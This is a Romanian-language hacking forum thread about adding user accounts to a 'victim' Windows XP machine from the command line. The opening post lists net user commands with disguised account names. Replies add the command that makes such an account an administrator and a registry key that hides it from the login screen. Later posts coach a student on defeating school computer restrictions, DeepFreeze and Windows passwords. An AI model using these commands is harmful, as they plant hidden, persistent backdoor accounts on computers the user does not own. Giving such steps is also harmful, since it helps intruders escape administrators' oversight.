Jump to content
c0der

Cum sa creezi user accounts in winxp din consola MS DOS

Recommended Posts

poti incerca pe calculatorul tau de acasa daca ai box care ruleaza windows xp, sau pe pc-ul tinta.

odata ce ne-am conectat la consola remote pc-ului[victima] , ca sa creezi un user nou trebuie folosita comanda asta:

net user username parola /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

exemple nice:

net user Admin hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Admini$trator hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Microsoft hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user User hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Gue$t hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user M$ hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Colossus hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Micro$oft hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Windows hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user Window$ hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user R00t hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

net user MSN hacked /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES

iar daca nu vrea sa se conecteze in remote desktop connection din winxp,va trebui sa schimbam numele domainului cu cel al victimei:clik dr pe my computer>properites>computer name> change > si scriem in loc de workgroup numele domeniului victimei

puteti salva parametrii de mai sus si intr-un fisier de tip extensie .bat

spor la treaba

Link to comment
Share on other sites

poi de exemplu in scoli, in majoritatea, sunt usere restrictionate adik nu poti instala un program etc, da ai acces la dos, dak bagi comanda aia iti face useru?
->s-ar putea incearca si tu posibilitatea asta, ar fi bine sa sti ce restrictii ai exacte- sa mi dau seama->uite-te si u la ce prog are instalate ,etc

ba este posibil phreak

ca sa iiti dau mai multe detalii zi-mi exact ce nu-ti da voie sa faci ce restrictii ai puse, tin minte ca si eu cand eram in liceu, aveam la sala de informatica, calc restrictionate, de exmplu aveam un prog cred ca se numea "blockexe" sau ceva de genu de bloca executabilele, insa mai poti avea si deepfreeze, sa sti ca pt fiecare este leac, si pt. parolele de windows.

numai zi-mi ce restrictionari au pc-urile de acolo, motivul pt care nu scriu acum la fiecare este ca sunt cam obosit ca nu prea am dormit in ultimu tp.(asa sa nu se supere userii de aici) asta e motivul, dar in scurt tp am sa-ti spun, numai zi-mi ce si cum, ca poate sunt alte programe de-ti restrict tie pc-urile nush ce ai tu, poate sa fie restrict si din windows mi se pare, dar in final poti trece usor de fiecare

ex.pt parolele de win poti trece usor, este un tut facut aici pe forum nu mai stiu linku

pt deepfreeze este undeepfreezer, etc

Link to comment
Share on other sites

comanda de mai sus creaza un user limitat.

acum daca vrei ca user creat sa apartina grupului administrators (adica sa ai drepturi de administrator) adaugi si comanda

net localgroup administrators [user] /add

sau intr-o singura linie

net user [user] [parola] /add /expires:never /passwordreq:yes /times:all /activ:yes & net localgroup administrators [user] /add

acum daca vrei ca userul creat sa fie ascuns mai adaugi o cheie in registri

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v [user] /t REG_DWORD /d 0

* comenzile astea mi se pare ca merg numai daca ai drepturi de administrator

pt phreak

daca nu poti deschide consola ms-dos atunci daca aveti Borland Pascal instalat pe calculator intri in BP si mergi la File -> Dos Shell si ai o consola MS DOS

sau poti sa-ti faci un fisier batch in care sa scrii

start cmd /c [comanda msdos aici]

Link to comment
Share on other sites

foarte bine explicat @shamat

@phreak - creezi un fisier test.bat si il editezi si pui aici "cmd" fara ghilimele si comanda care doresti sa o folosesti [ vezi tutorialele de pe forum =>"comenzi ms-dos", si "cum sa treci de parola de la windows xp"

sau cel mai bine inveti backtrack :PP

dai de un fisier document (.txt,.doc ....etc.) si din asta creezi altul nou, te duci sus la new->text file, apoi sa zicem ca fisierul nou il denumesti xxx.txt, apoi intri in acesta[xxx.txt], si scrii in fisierul text nou creat urmatoarele :

cmd ipconfig -all

si ai acces la consola, eu am incercat si a mers, asa ar trebui si la tine, si nu uita in cele din urma [FII INVENTIV] altfel nu faci fata in lumea asta virtuala.

apoi redenumesti xxx.txt in xxx.bat, si dai dublu click pe el si aia e.good luck

ps. eu am dat exemplu cu ipconfig -all, nu-mi sariti in cap, aici posibil sa da/nu iti apara setarile cu datele placii de retea[mac, ip, subnet, gateway , si altele]

Link to comment
Share on other sites

n-am voie sa scriu decat in anumite fisiere - desktop si salvari elevi, in c direct nu ma lasa {acces dennied} deci faza lui virus care cica merge si la scoala nu-i valabila si la mine....cu batu ii tot aia ca-n ms dos numa ca poti sa dai copy paste...la comanda net user imi da denied, alte idei? :)

Link to comment
Share on other sites

n-am voie sa scriu decat in anumite fisiere - desktop si salvari elevi, in c direct nu ma lasa {acces dennied} deci faza lui virus care cica merge si la scoala nu-i valabila si la mine....cu batu ii tot aia ca-n ms dos numa ca poti sa dai copy paste...la comanda net user imi da denied, alte idei? :)

salut din nou

pai normal ca nu te lasa ca are anumite servicii din windows oprite[disabled].scrie in ms-dos :

services.msc

si da i la majoritatea optiunilor din partea dreapta a ferestrei care iti apare, click dreapta pe fiecare, si properties > bifeaza automatic > apoi apasa ok > intra din nou apoi pe serviciu si da-i start , si asa faci la toate.

apoi incerci treaba aia cu net user .

mai revin cu detalii mai tarziu si sa imi spui daca ti-a mers

Link to comment
Share on other sites

o sa incerc si daca nu bag frumos live cd :|

LATER EDIT : Acces denied zice ca nu-i da voie sa modifice :)

Vezi ce scrie pe PC... daca scrie RM ...sau daca sti ca sunt sisteme RM nu te mai chinui degeaba cu metodele clasice(cmd-uri...etc) ca nu merge.

Sistemele RM sunt din fabricatie concepute ptr. a bloca scolerii...si eu le studiez securitatea...pare interesanta...

...Daca ii PC normal atunci mai incearca variantele de pe aici...nush...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...